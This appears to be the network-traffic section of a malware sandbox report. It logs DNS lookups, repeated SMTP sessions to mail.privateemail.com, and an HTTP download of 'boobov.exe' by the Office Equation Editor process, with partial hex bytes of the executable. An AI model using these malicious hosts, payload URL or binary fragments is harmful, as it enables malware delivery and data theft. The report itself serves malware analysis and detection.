                                                                            Jan 27, 2021 19:30:55.083677053 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.083758116 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.083851099 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.090295076 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.090441942 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.290062904 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.290112019 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.290360928 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.290453911 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.296531916 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.296703100 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.496040106 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.496062040 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.496069908 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.496288061 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.500833035 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.500855923 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.500894070 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.500986099 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.501090050 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.501782894 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.701895952 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.701920986 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.701961040 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.702090025 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.702366114 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.702446938 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.702461958 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.702475071 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.702759981 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.706636906 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.706655025 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.706672907 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.706685066 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.706795931 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.707065105 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.707190037 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.707303047 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.707422972 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:55.908926010 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.909415007 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.910172939 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.910196066 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.910203934 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.913132906 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.913309097 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:55.926386118 CET58749174198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:56.130260944 CET49174587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:58.853790045 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:59.047341108 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:59.047450066 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:59.243333101 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:59.243845940 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:59.437158108 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:59.437447071 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:59.438045025 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:59.631119013 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:59.632096052 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:59.827064037 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:59.827284098 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:59.827297926 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:30:59.827491999 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:59.830619097 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:30:59.840423107 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:00.026079893 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.026103020 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.035975933 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.037259102 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.038275003 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:00.231355906 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.232912064 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.234016895 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:00.426873922 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.429558992 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.430330992 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:00.623224020 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.626065969 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.626909018 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:00.820059061 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.845009089 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:00.845809937 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.038916111 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.040956974 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.041462898 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.041593075 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.046185970 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.046448946 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.049753904 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.324729919 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.324857950 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.324881077 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.324909925 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.324939966 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.324984074 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.519191027 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.519421101 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.519465923 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.519473076 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.519566059 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.519587040 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.712543011 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.712605953 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.712624073 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.712652922 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.712785959 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.712905884 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.713004112 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.906050920 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.906091928 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.906119108 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.906143904 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.906179905 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.906213999 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.906239986 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.906285048 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.906285048 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.906387091 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.906405926 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.906418085 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.906431913 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.906449080 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.906457901 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:01.906493902 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.906531096 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.906559944 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.906584978 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:01.907841921 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:02.099478006 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.099523067 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.099585056 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.099699974 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.099730015 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.099756956 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.099847078 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:02.099886894 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.099977016 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.100028038 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.100126982 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.100155115 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.100840092 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.100950003 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.101123095 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.101150990 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.101346016 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:02.292886019 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.293781042 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:02.294294119 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.294423103 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.294450045 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.294511080 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.294545889 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.294620037 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.294646025 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.294728041 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.295062065 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:02.295275927 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:02.295492887 CET49175587192.168.2.22198.54.122.60
                                                                            Jan 27, 2021 19:31:02.487016916 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.487062931 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.487082005 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.487987995 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.492213964 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.492233038 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.501512051 CET58749175198.54.122.60192.168.2.22
                                                                            Jan 27, 2021 19:31:02.698493958 CET49175587192.168.2.22198.54.122.60

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 27, 2021 19:29:35.743539095 CET5219753192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:29:35.968858957 CET53521978.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:18.302427053 CET5309953192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:18.358746052 CET53530998.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:18.359721899 CET5309953192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:18.416305065 CET53530998.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:24.889395952 CET5283853192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:24.945761919 CET53528388.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:24.946649075 CET5283853192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:25.009015083 CET53528388.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:26.787317038 CET6120053192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:26.837258101 CET53612008.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:26.850505114 CET4954853192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:26.898401976 CET53495488.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:32.899270058 CET5562753192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:32.947115898 CET53556278.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:32.947629929 CET5562753192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:32.995476007 CET53556278.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:42.171370029 CET5600953192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:42.229362965 CET53560098.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:52.314512014 CET6186553192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:52.362375975 CET53618658.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:58.741722107 CET5517153192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:58.801039934 CET53551718.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:58.801891088 CET5517153192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:58.852639914 CET53551718.8.8.8192.168.2.22

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Jan 27, 2021 19:29:35.743539095 CET192.168.2.228.8.8.80x315eStandard query (0)cy.kl-re.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.302427053 CET192.168.2.228.8.8.80xc52cStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.359721899 CET192.168.2.228.8.8.80xc52cStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:24.889395952 CET192.168.2.228.8.8.80x4d68Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:24.946649075 CET192.168.2.228.8.8.80x4d68Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.899270058 CET192.168.2.228.8.8.80xd43aStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.947629929 CET192.168.2.228.8.8.80xd43aStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:42.171370029 CET192.168.2.228.8.8.80xdaaeStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:52.314512014 CET192.168.2.228.8.8.80x535aStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.741722107 CET192.168.2.228.8.8.80x2228Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.801891088 CET192.168.2.228.8.8.80x2228Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Jan 27, 2021 19:29:35.968858957 CET8.8.8.8192.168.2.220x315eNo error (0)cy.kl-re.comcybersng.duckdns.orgCNAME (Canonical name)IN (0x0001)
                                                                            Jan 27, 2021 19:29:35.968858957 CET8.8.8.8192.168.2.220x315eNo error (0)cybersng.duckdns.org172.111.202.41A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.358746052 CET8.8.8.8192.168.2.220xc52cNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.416305065 CET8.8.8.8192.168.2.220xc52cNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:24.945761919 CET8.8.8.8192.168.2.220x4d68No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:25.009015083 CET8.8.8.8192.168.2.220x4d68No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.947115898 CET8.8.8.8192.168.2.220xd43aNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.995476007 CET8.8.8.8192.168.2.220xd43aNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:42.229362965 CET8.8.8.8192.168.2.220xdaaeNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:52.362375975 CET8.8.8.8192.168.2.220x535aNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.801039934 CET8.8.8.8192.168.2.220x2228No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.852639914 CET8.8.8.8192.168.2.220x2228No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • cy.kl-re.com
                                                                            • 193.239.147.103

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.2249167172.111.202.4180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 27, 2021 19:29:36.072925091 CET0OUTGET //power/bo/boobov.exe HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: cy.kl-re.com
                                                                            Connection: Keep-Alive
                                                                            Jan 27, 2021 19:29:36.354144096 CET2INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 27 Jan 2021 18:29:36 GMT
                                                                            Content-Type: application/x-msdownload
                                                                            Content-Length: 246784
                                                                            Connection: keep-alive
                                                                            Last-Modified: Tue, 26 Jan 2021 23:18:29 GMT
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Nginx-Upstream-Cache-Status: EXPIRED
                                                                            X-Server-Powered-By: Engintron
                                                                            Accept-Ranges: bytes
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 a3 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b6 03 00 00 0c 00 00 00 00 00 00 1e d4 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 ac d0 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 d3 03 00 57 00 00 00 00 e0 03 00 e8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 03 00 00 20 00 00 00 b6 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 08 00 00 00 e0 03 00 00 0a 00 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 03 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 2e 00 00 d0 a4 03 00 0b 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a ba 72 5c 91 00 70 28 4e 03 00 0a 80 01 00 00 04 73 8a 00 00 0a 80 02 00 00 04 72 60 91 00 70 80 03 00 00 04 73 4f 03 00 0a 80 04 00 00 04 2a a6 72 d3 93 00 70 19 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8b 93 00 70 a2 25 18 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8f 93 00 70 a2 25 18 72 8b 93 00 70 a2 25 19 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72 3d 66 00 70 a2 25 17 72 a3 93 00 70 a2 25 18 72 3d 66 00 70 a2 25 19 72 09 67 00 70 a2 28 3c 02 00 0a 2a 7e 7e 05 00 00 04 3a 0f 00 00 00 28 30 00 00 06 73 67 03 00 0a 80 05 00 00 04 7e 05 00 00 04 2a 1a 20 00 00 00 00 2a 32 72 78 96 00 70 14 28 29 00 00 06 2a 32 72 ae 96 00 70 14 28 29 00
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL ` @ `W H.text$ `.rsrc@@.reloc@BH.P *r\p(Nsr`psO*rp%rp%rp%rp(<*rp%rp%rp%rp%rp(<*rp%r=fp%rp%r=fp%rgp(<*~~:(0sg~* *2rxp()*2rp()
                                                                            Jan 27, 2021 19:29:36.354203939 CET3INData Raw: 00 06 2a 2e d0 e6 00 00 01 28 12 00 00 0a 2a 7e 7e 0b 00 00 04 3a 0f 00 00 00 28 3a 00 00 06 73 6d 03 00 0a 80 0b 00 00 04 7e 0b 00 00 04 2a fa fe 09 01 00 39 30 00 00 00 28 32 00 00 06 39 18 00 00 00 fe 09 00 00 72 de 96 00 70 fe 09 01 00 28 6a
                                                                            Data Ascii: *.(*~~:(:sm~*90(29rp(j(*(<**2r:p(3*2rVp(3*.(*0%sP%(oQoR8(SsT(Uo
                                                                            Jan 27, 2021 19:29:36.354243994 CET4INData Raw: ff a1 fe ff ff d1 fe ff ff e0 fe ff ff f9 fe ff ff 21 ff ff ff 33 ff ff ff 52 ff ff ff 83 ff ff ff a7 ff ff ff dd 67 00 00 00 fe 0c 02 00 fe 0e 01 00 fe 0c 00 00 20 fe ff ff ff 3d 0a 00 00 00 20 01 00 00 00 38 04 00 00 00 fe 0c 00 00 45 02 00 00
                                                                            Data Ascii: !3Rg = 8Ev1u% _ _t%(Y 3(fz9(Z*A<0RrpA%rp%rap%
                                                                            Jan 27, 2021 19:29:36.354281902 CET6INData Raw: 39 35 00 00 00 72 b4 95 00 70 20 02 00 00 00 8d 06 00 00 01 25 20 00 00 00 00 fe 09 00 00 a2 25 20 01 00 00 00 fe 09 01 00 a2 28 6a 03 00 0a 72 ec 95 00 70 28 0d 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 6b 03 00 0a 2a 00 00 00 13 30 05 00 5c 00 00
                                                                            Data Ascii: 95rp % % (jrp(*(k*0\((9@rp % % % (jr,p(*(e*0k((9KrFp % % %
                                                                            Jan 27, 2021 19:29:36.354320049 CET7INData Raw: 00 09 1b 01 00 da 82 01 00 06 00 11 83 01 00 da 82 01 00 06 00 17 83 01 00 da 82 01 00 06 00 27 83 01 00 da 82 01 00 0e 00 2f 83 01 00 3b 83 01 00 0e 00 46 83 01 00 3b 83 01 00 0e 00 51 83 01 00 3b 83 01 00 0e 00 9a 2d 00 00 3b 83 01 00 0e 00 68
                                                                            Data Ascii: '/;F;Q;-;h;ua;p??d?.q0ipIipop(:
                                                                            Jan 27, 2021 19:29:36.354357004 CET8INData Raw: 00 0a 00 3e 88 01 00 70 81 01 00 0a 00 32 68 00 00 70 81 01 00 0a 00 62 69 00 00 70 81 01 00 0a 00 6a 68 00 00 70 81 01 00 0a 00 d6 68 00 00 70 81 01 00 0a 00 0a 69 00 00 70 81 01 00 0a 00 e2 6b 00 00 5f 81 01 00 0a 00 5c 88 01 00 5f 81 01 00 0a
                                                                            Data Ascii: >p2hpbipjhphpipk_\_~hp>gakaOkkkgpjalnla=oagaqa
